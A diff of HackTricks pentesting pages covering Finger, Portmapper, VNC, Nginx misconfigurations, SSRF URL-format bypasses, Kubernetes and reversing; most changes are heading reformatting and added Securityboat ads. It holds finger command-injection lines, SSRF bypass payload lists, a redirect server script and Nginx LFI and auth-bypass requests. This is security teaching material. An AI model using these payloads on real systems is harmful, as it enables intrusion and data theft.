@ -111,6 +118,13 @@ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd.
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,4 +1,4 @@
# 79 - Pentesting Finger
<details> <details>
@ -16,28 +16,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# **Basic Info** {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files. ## **Basic Info**
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
**Default port:** 79 **Default port:** 79
```text ```
PORT STATE SERVICE PORT STATE SERVICE
79/tcp open finger 79/tcp open finger
``` ```
# **Enumeration** ## **Enumeration**
## **Banner Grabbing/Basic connection** ### **Banner Grabbing/Basic connection**
```bash ```bash
nc -vn <IP> 79 nc -vn <IP> 79
echo "root" | nc -vn <IP> 79 echo "root" | nc -vn <IP> 79
``` ```
## **User enumeration** ### **User enumeration**
```bash ```bash
finger @<Victim> #List users finger @<Victim> #List users
@ -53,35 +59,40 @@ finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt finger-user-enum.pl -U users.txt -T ips.txt
``` ```
### **Nmap execute a script for doing using default scripts** #### **Nmap execute a script for doing using default scripts**
## Metasploit uses more tricks than Nmap ### Metasploit uses more tricks than Nmap
```text ```
use auxiliary/scanner/finger/finger_users use auxiliary/scanner/finger/finger_users
``` ```
## Shodan ### Shodan
* `port:79 USER` * `port:79 USER`
# Command execution ## Command execution
```bash ```bash
finger "|/bin/id@example.com" finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com" finger "|/bin/ls -a /@example.com"
``` ```
# Finger Bounce ## Finger Bounce
[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```text ```
finger user@host@victim finger user@host@victim
finger @internal@external finger @internal@external
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -98,5 +109,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# 111/TCP/UDP - Pentesting Portmapper
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Basic Information {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information
Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
@ -28,7 +34,7 @@ PORT STATE SERVICE
111/tcp open rpcbind 111/tcp open rpcbind
``` ```
# Enumeration ## Enumeration
``` ```
rpcinfo irked.htb rpcinfo irked.htb
@ -39,11 +45,11 @@ Sometimes it doesn't give you any information, in other occasions you will get s
![](<../.gitbook/assets/image (230).png>) ![](<../.gitbook/assets/image (230).png>)
## Shodan ### Shodan
* `port:111 portmap` * `port:111 portmap`
# RPCBind + NFS ## RPCBind + NFS
If you find the service NFS then probably you will be able to list and download(and maybe upload) files: If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
@ -51,7 +57,7 @@ If you find the service NFS then probably you will be able to list and download(
Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol. Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
# NIS ## NIS
If you find the service `ypbind`running: If you find the service `ypbind`running:
@ -81,7 +87,7 @@ yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
| /etc/group | group.byname, group.bygid | NIS group file | | /etc/group | group.byname, group.bygid | NIS group file |
| /usr/lib/aliases | mail.aliases | Details mail aliases | | /usr/lib/aliases | mail.aliases | Details mail aliases |
# RPC Users ## RPC Users
If you find the **rusersd** service listed like this: If you find the **rusersd** service listed like this:
@ -89,17 +95,17 @@ If you find the **rusersd** service listed like this:
You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md). You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
# Bypass Filtered Portmapper port ## Bypass Filtered Portmapper port
If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\ If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\
But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\ But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\
More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
# Shodan ## Shodan
* `Portmap` * `Portmap`
# HackTricks Automatic Commands ## HackTricks Automatic Commands
``` ```
Protocol_Name: Portmapper #Protocol Abbreviation if there is one. Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
@ -125,6 +131,12 @@ Entry_3:
Command: nmap -sSUC -p 111 {IP} Command: nmap -sSUC -p 111 {IP}
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -141,5 +153,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\ In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\
@ -64,6 +71,13 @@ I save the tool here also for ease of access:
* `port:5900 RFB` * `port:5900 RFB`
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,4 +1,4 @@
# Nginx
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Missing root location <a href="#missing-root-location" id="missing-root-location"></a> {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Missing root location <a href="#missing-root-location" id="missing-root-location"></a>
``` ```
server { server {
@ -30,11 +36,11 @@ server {
} }
``` ```
The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. &#x20; The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.
A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
# Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a> ## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
Inside the Nginx configuration look the "location" statements, if someone looks like: Inside the Nginx configuration look the "location" statements, if someone looks like:
@ -78,7 +84,7 @@ alias../../../../../../../../../../../ => HTTP status code 400
alias../ => HTTP status code 403 alias../ => HTTP status code 403
``` ```
# Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a> ## Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
An example of a vulnerable Nginx configuration is: An example of a vulnerable Nginx configuration is:
@ -100,13 +106,13 @@ Location: https://example.com/
Detectify: clrf Detectify: clrf
``` ```
Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
## Any variable ### Any variable
In some cases, user-supplied data can be treated as an Nginx variable. Its unclear why this may be happening, but its not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. In some cases, user-supplied data can be treated as an Nginx variable. Its unclear why this may be happening, but its not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI.
One way to test for this is to set a referer header value:&#x20; One way to test for this is to set a referer header value:
``` ```
$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
@ -114,9 +120,9 @@ $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.
# Raw backend response reading ## Raw backend response reading
With Nginxs `proxy_pass`, theres the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that its an HTTP response?&#x20; With Nginxs `proxy_pass`, theres the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that its an HTTP response?
If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx wont understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx wont understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:
@ -127,7 +133,7 @@ def application(environ, start_response):
return [b"Secret info, should not be visible!"] return [b"Secret info, should not be visible!"]
``` ```
And with the following directives in Nginx:&#x20; And with the following directives in Nginx:
``` ```
http { http {
@ -139,7 +145,7 @@ http {
[proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.&#x20; [proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.
If we send a normal `GET` request, Nginx will return: If we send a normal `GET` request, Nginx will return:
@ -169,13 +175,13 @@ Secret-Header: secret-info
Secret info, should not be visible! Secret info, should not be visible!
``` ```
# merge\_slashes set to off ## merge\_slashes set to off
The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application thats being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application thats being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
We found 33 Nginx configuration files with `merge_slashes` set to “off”. &#x20; We found 33 Nginx configuration files with `merge_slashes` set to “off”.
# default is not specified for map directive ## default is not specified for map directive
It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like: It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like:
@ -208,11 +214,9 @@ server {
> sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\ > sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\
> resulting value will be an empty string. > resulting value will be an empty string.
It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.&#x20; It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.
# DNS Spoofing Nginx
## DNS Spoofing Nginx
According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**. According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**.
@ -222,31 +226,37 @@ Nginx can specify a DNS server to use with:
resolver 8.8.8.8; resolver 8.8.8.8;
``` ```
# `proxy_pass` and `internal` directives ## `proxy_pass` and `internal` directives
The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\ The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\
The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**. The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**.
The use of these directives **isn't a vulnerability but you should check how are them configured**. The use of these directives **isn't a vulnerability but you should check how are them configured**.
# Try it yourself ## Try it yourself
Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
# Static Analyzer tools ## Static Analyzer tools
## [GIXY](https://github.com/yandex/gixy) ### [GIXY](https://github.com/yandex/gixy)
Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection. Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
# References ## References
* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** * [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
* ****[**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)**** * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* ****[**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)**** * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -263,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# URL Format Bypass
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
## Localhost {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
### Localhost
```bash ```bash
# Localhost # Localhost
@ -85,7 +91,7 @@ spoofed.burpcollaborator.net = 127.0.0.1
![](<../../.gitbook/assets/image (649) (1) (1).png>) ![](<../../.gitbook/assets/image (649) (1) (1).png>)
## Domain Parser ### Domain Parser
```bash ```bash
https:attacker.com https:attacker.com
@ -115,7 +121,7 @@ attacker。com
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
``` ```
## Domain Confusion ### Domain Confusion
```bash ```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost # Try also to change attacker.com for 127.0.0.1 to try to access localhost
@ -160,7 +166,7 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
next={domain}&next=attacker.com next={domain}&next=attacker.com
``` ```
## Paths and Extensions Bypass ### Paths and Extensions Bypass
If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses: If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:
@ -170,7 +176,7 @@ https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path https://metadata/expected/path/..%2f..%2f/vulnerable/path
``` ```
## Bypass via redirect ### Bypass via redirect
It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
@ -197,9 +203,9 @@ class Redirect(BaseHTTPRequestHandler):
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
``` ```
# Explained Tricks ## Explained Tricks
## Blackslash-trick ### Blackslash-trick
In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.
@ -207,12 +213,18 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The
![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) ![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
## Other Confusions ### Other Confusions
![](<../../.gitbook/assets/image (629).png>) ![](<../../.gitbook/assets/image (629).png>)
image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.
## Finding exposed pods with OSINT ## Finding exposed pods with OSINT
@ -223,6 +230,13 @@ For example, a remote attacker can abuse this by accessing the following URL: `h
{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} {% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,7 +1,5 @@
# Reversing Tools & Basic Methods # Reversing Tools & Basic Methods
## Reversing Tools & Basic Methods
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -18,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Wasm decompiler / Wat compiler ## Wasm decompiler / Wat compiler
Online: Online:
@ -398,6 +403,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,4 +1,4 @@
# ASREPRoast
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# ASREPRoast {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## ASREPRoast
